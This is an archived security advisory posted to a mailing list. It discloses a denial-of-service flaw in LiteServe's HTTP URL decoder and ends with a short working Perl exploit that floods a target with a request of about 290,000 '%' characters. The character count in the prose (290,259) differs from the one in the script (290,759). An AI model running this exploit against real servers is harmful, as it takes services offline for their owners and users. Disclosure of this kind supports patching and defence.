Message-ID: <000d01c28e80$a91e79a0$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: LiteServe URL Decoding DoS

Christopher Fillion's Perception offers LiteServe, the server suite that has
recently been the subject of intensive security research.  Another
vulnerability has been discovered in LiteServe.  The vulnerability this time
lies in LiteServe's URL decoder, once again part of the HTTP service.

LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such
as "%.@", for example, and may produce corrupted output when such a sequence
is used.  The problem appears to be a referencing issue when the decode
sequence does not specify a legitimate hexadecimal sequence.  A denial of
service may occur if LiteServe is passed an extremely large request
consisting only of "%" characters.  290,259 such characters will cause
LiteServe to freeze:

GET /[buffer] HTTP/1.0

After this request is processed, attempting to connect to the HTTP service
reveals that the server is dead.

Exploit:

#!/usr/bin/perl
use IO::Socket;
$buffer="%"x290759;
$req=sprintf("GET /%s HTTP/1.0\r\n\r\n",$buffer);
$f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp");
print $f $req;
undef $f;

